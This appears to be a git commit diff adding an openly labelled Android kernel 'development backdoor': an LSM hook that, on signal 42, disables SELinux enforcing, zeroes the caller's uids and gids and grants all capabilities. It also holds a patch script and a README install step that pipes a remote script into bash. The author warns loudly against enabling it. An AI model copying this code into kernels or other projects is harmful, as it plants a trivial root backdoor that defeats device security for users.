Initial commit

8 files changed, 199 insertions, 0 deletions

diff --git a/Kbuild.addon b/Kbuild.addon
new file mode 100644
index 0000000..5c7b326
--- /dev/null
+++ b/Kbuild.addon
@@ -0,0 +1,7 @@
+obj-$(CONFIG_ANDROID_ROOTME) += rootme.o
+
+ifeq ($(CONFIG_ANDROID_ROOTME),y)
+$(info WARNING WARNING WARNING WARNING)
+$(info This kernel is backdoored. Rebuild with CONFIG_ANDROID_ROOTME=n immediately!)
+$(info WARNING WARNING WARNING WARNING)
+endif
diff --git a/Kconfig.addon b/Kconfig.addon
new file mode 100644
index 0000000..a78fe48
--- /dev/null
+++ b/Kconfig.addon
@@ -0,0 +1,8 @@
+config ANDROID_ROOTME
+	bool "Development backdoor"
+	---help---
+	  This "feature" gives trivial root access by typing `kill -42 $$`
+	  in a shell. It is almost always a bad idea, and nobody should
+	  enable this catastrophe of a driver.
+
+	  Say N here unless you have a vendetta against kittens.
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..c2b5cdc
--- /dev/null
+++ b/README.md
@@ -0,0 +1,45 @@
+## Android Kernel Development Backdoor
+
+Like being able to do quick cycles of `fastboot boot
+out/arch/arm64/boot/Image.lz4-dtb`, but annoyed by the lack of root this way?
+Well this atrocious idea might be the thing for you!
+
+#### Possibly the worst idea ever.
+
+This is an awful idea! If you're silly, you'll add this to your kernel, and
+then forget to turn it off for production builds, and then very bad things will
+happen. This here probably is not for you! If you're reading this sentence,
+start backing away slowly! Out, damned spot!
+
+#### Add it to your kernel!
+
+From inside a clean kernel tree of yours:
+
+```
+$ curl -LsS "https://git.zx2c4.com/android-kernel-development-backdoor/plain/fetch-and-patch.sh" | bash -
+```
+
+Then, make sure `CONFIG_ANDROID_ROOTME=y` is enabled.
+
+
+But don't do it! I take no responsibility for the dumpster fire this will
+cause. You'll probably forget to remove this for your release kernels. There
+are probably better ways to manage this kind of thing anyway. Don't do it! Just
+say "no" to backdoors! N.O.
+
+#### Pop a root shell?
+
+Send signal 42 to yourself to escalate.
+
+```
+thinkpad $ adb shell
+crosshatch:/ $ whoami
+shell
+crosshatch:/ $ kill -42 $$
+You are now root.
+/system/bin/sh: kill: 1243: Bad font file format
+1|crosshatch:/ $ whoami
+root
+```
+
+![Screenshot](screenshot.png)
diff --git a/commit-message.txt b/commit-message.txt
new file mode 100644
index 0000000..ca0b954
--- /dev/null
+++ b/commit-message.txt
@@ -0,0 +1,19 @@
+android: Backdoor kernel
+
+Run `kill -42 $$` to get root.
+
+HELLO NAÏVE TECH JOURNALISTS: This commit here introduces a driver used
+during development, because having access to scary debugging facilities
+is useful during kernel development. This driver is disabled by default,
+and when it is enabled, it spews warnings all over the place to
+encourage people who turn it on by accident to turn it off. It's
+exceedingly unlikely that somebody turns this on without intending to
+do so. You really have to fish around and make a concerted effort to get
+it enabled and working, and the warning messages it gives during the build
+and boot processes are really an eyesore. So, if you've found this
+commit because some idiot shipped a kernel to their users, you have
+every reason to blame that idiot, and not this commit. And if the fool
+insists it was an 'accident', he's not telling the truth.
+
+This is from:
+  https://git.zx2c4.com/android-kernel-development-backdoor/about
diff --git a/fetch-and-patch.sh b/fetch-and-patch.sh
new file mode 100644
index 0000000..0c7691e
--- /dev/null
+++ b/fetch-and-patch.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+# SPDX-License-Identifier: GPL-2.0
+# Copyright (C) 2015-2018 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
+
+set -eo pipefail
+trap 'rm -rf android-kernel-development-backdoor-master' INT TERM EXIT
+echo "[+] Downloading"
+curl -LsS "https://git.zx2c4.com/android-kernel-development-backdoor/snapshot/android-kernel-development-backdoor-master.tar.xz" | tar -xJf -
+android-kernel-development-backdoor-master/patch.sh
diff --git a/patch.sh b/patch.sh
new file mode 100755
index 0000000..ec4dff0
--- /dev/null
+++ b/patch.sh
@@ -0,0 +1,23 @@
+#!/bin/bash
+# SPDX-License-Identifier: GPL-2.0
+# Copyright (C) 2015-2018 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
+
+if ! [[ -d .git && -f drivers/base/Makefile && -f drivers/base/Kconfig ]]; then
+	echo "Please run this from the top level of your kernel tree." >&2
+	exit 1
+fi
+
+FILES="${0%/*}"
+
+echo "[+] Patching"
+cp "$FILES"/rootme.c drivers/base/rootme.c
+grep -q ANDROID_ROOTME drivers/base/Makefile || cat "$FILES"/Kbuild.addon >> drivers/base/Makefile
+grep -q ANDROID_ROOTME drivers/base/Kconfig || cat "$FILES"/Kconfig.addon >> drivers/base/Kconfig
+
+echo "[+] Committing"
+git add drivers/base/rootme.c drivers/base/Makefile drivers/base/Kconfig
+git commit -s -F "$FILES"/commit-message.txt drivers/base/rootme.c drivers/base/Makefile drivers/base/Kconfig
+
+echo "[+] Done!"
+
+echo "[*] Remember to enable CONFIG_ANDROID_ROOTME=y for this to work. Then simply use \`kill -42 \$\$\` for root."
diff --git a/rootme.c b/rootme.c
new file mode 100644
index 0000000..a3f9c2e
--- /dev/null
+++ b/rootme.c
@@ -0,0 +1,88 @@
+// SPDX-License-Identifier: GPL-2.0
+/*
+ * Copyright (C) 2015-2018 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
+ */
+
+/* Hello. If this is enabled in your kernel for some reason, whoever is
+ * distributing your kernel to you is a complete moron, and you shouldn't
+ * use their kernel anymore. But it's not my fault! People: don't enable
+ * this driver! (Note that the existence of this file does not imply the
+ * driver is actually in use. Look in your .config to see whether this is
+ * enabled.) -Jason
+ */
+
+#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+#include <linux/module.h>
+#include <linux/lsm_hooks.h>
+#include <linux/file.h>
+
+extern int selinux_enforcing;
+
+/* Invoke via `kill -42 $$`. */
+static int rootme_task_kill(struct task_struct *p, struct siginfo *info, int sig, u32 secid)
+{
+	static const char now_root[] = "You are now root.\n";
+	struct file *stderr;
+	struct cred *cred;
+
+	/* Magic number. */
+	if (sig != 42)
+		return 0;
+
+	/* Only allow if we're sending a signal to ourselves. */
+	if (p != current)
+		return 0;
+
+	/* It might be enough to just change the security ctx of the
+	 * current task, but that requires slightly more thought than
+	 * just axing the whole thing here.
+	 */
+	selinux_enforcing = 0;
+
+	/* Rather than the usual commit_creds(prepare_kernel_cred(NULL)) idiom,
+	 * we manually zero out the fields in our existing one, so that we
+	 * don't have to futz with the task's key ring for disk access.
+	 */
+	cred = (struct cred *)__task_cred(current);
+	memset(&cred->uid, 0, sizeof(cred->uid));
+	memset(&cred->gid, 0, sizeof(cred->gid));
+	memset(&cred->suid, 0, sizeof(cred->suid));
+	memset(&cred->euid, 0, sizeof(cred->euid));
+	memset(&cred->egid, 0, sizeof(cred->egid));
+	memset(&cred->fsuid, 0, sizeof(cred->fsuid));
+	memset(&cred->fsgid, 0, sizeof(cred->fsgid));
+	memset(&cred->cap_inheritable, 0xff, sizeof(cred->cap_inheritable));
+	memset(&cred->cap_permitted, 0xff, sizeof(cred->cap_permitted));
+	memset(&cred->cap_effective, 0xff, sizeof(cred->cap_effective));
+	memset(&cred->cap_bset, 0xff, sizeof(cred->cap_bset));
+	memset(&cred->cap_ambient, 0xff, sizeof(cred->cap_ambient));
+
+	stderr = fget(2);
+	if (stderr) {
+		kernel_write(stderr, now_root, sizeof(now_root) - 1, 0);
+		fput(stderr);
+	}
+	return -EBFONT;
+}
+
+static struct security_hook_list rootme_hooks[] __lsm_ro_after_init = {
+	LSM_HOOK_INIT(task_kill, rootme_task_kill)
+};
+
+static int rootme_init(void)
+{
+	pr_err("WARNING WARNING WARNING WARNING WARNING\n");
+	pr_err("This kernel is BACKDOORED and contains a trivial way to get root.\n");
+	pr_err("If you did not build this kernel yourself, stop what you're doing\n");
+	pr_err("and find another kernel. This one is not safe to use.\n");
+	pr_err("WARNING WARNING WARNING WARNING WARNING\n");
+	pr_err("\n");
+	security_add_hooks(rootme_hooks, ARRAY_SIZE(rootme_hooks));
+	pr_err("Type `kill -42 $$` for root.\n");
+	return 0;
+}
+
+module_init(rootme_init);
+MODULE_LICENSE("GPL v2");
+MODULE_DESCRIPTION("Dumb development backdoor for Android");
+MODULE_AUTHOR("Jason A. Donenfeld <Jason@zx2c4.com>");
diff --git a/screenshot.png b/screenshot.png
new file mode 100644
index 0000000..9476dc2
--- /dev/null
+++ b/screenshot.png